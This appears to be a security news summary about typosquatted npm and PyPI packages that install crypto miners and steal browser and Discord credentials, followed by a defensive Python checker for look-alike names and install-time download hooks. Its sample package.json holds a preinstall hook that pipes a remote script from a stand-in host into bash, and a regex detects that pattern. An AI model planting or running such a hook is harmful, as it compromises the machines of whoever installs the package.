"Malware Floods npm and PyPI Registries in Supply-Chain Attacks"

Sonatype researchers have discovered 186 malicious packages in the npm JavaScript library registry that infect Linux hosts with cryptocurrency mining applications. According to Sonatype, many of the packages, published by the same pseudonymous npm account, use names such as "r2act" to deceive users of well-known software such as React. The malicious packages download a malicious Bash shell script that retrieves the Monero cryptocurrency mining code from the threat actor's server. Sonatype also reported that another researcher, Hauke Lübbers, had discovered 55 malicious packages in the Python language PyPI registry that attempted to download similar cryptocurrency mining scripts from the same server. Snyk discovered 12 malicious PyPI packages from the same author that were intended to compromise Windows hosts. These packages, given names such as "hackerfilelol," would try to download malicious files from the Content Delivery Network (CDN) of the chat application Discord. When executed, the malware would try to steal Google Chrome passwords, cookies, history, and other data, as well as steal Discord tokens and inject a persistent malicious agent into the chat app process. This article continues to discuss the flooding of npm and PyPI registries with malicious packages.
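The two warning signs the article describes, a package name that is a near-miss of a popular one (such as "r2act" for React) and an install hook that fetches and runs a remote shell script, can be checked before a package is installed. The following is an added example, not code from the article or from Sonatype or Snyk; the popular-package list, the regular expression and the sample package.json are constructed for illustration.

```python
"""Flag npm packages whose name is one edit away from a popular package
and whose install-time lifecycle scripts pipe a remote download into a shell."""
import re

# Constructed allowlist of well-known package names to compare against.
POPULAR = {"react", "react-dom", "lodash", "express", "axios"}

# Lifecycle hooks that npm runs automatically during installation.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")
# Constructed pattern: a curl/wget download piped straight into sh or bash.
REMOTE_FETCH = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance computed with a rolling row of the DP table."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_target(name: str, popular=POPULAR, max_dist: int = 1):
    """Return the popular name this package is within max_dist edits of, if any."""
    if name in popular:
        return None  # the genuine package, not a look-alike
    dist, target = min((edit_distance(name, p), p) for p in popular)
    return target if dist <= max_dist else None


def install_hook_findings(pkg: dict) -> list:
    """List install-time scripts that pipe a remote download into a shell."""
    scripts = pkg.get("scripts", {})
    return [hook for hook in INSTALL_HOOKS
            if hook in scripts and REMOTE_FETCH.search(scripts[hook])]


def assess(pkg: dict) -> dict:
    """Combine both checks for one parsed package.json."""
    return {"typosquat_of": typosquat_target(pkg["name"]),
            "suspicious_hooks": install_hook_findings(pkg)}


# Constructed sample package.json resembling the behaviour described above.
SAMPLE = {"name": "r2act", "version": "1.0.0",
          "scripts": {"preinstall": "curl -s http://example.invalid/x.sh | bash"}}

if __name__ == "__main__":
    print(assess(SAMPLE))
```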

iTnews reports "Malware Floods npm and PyPI Registries in Supply-Chain Attacks"
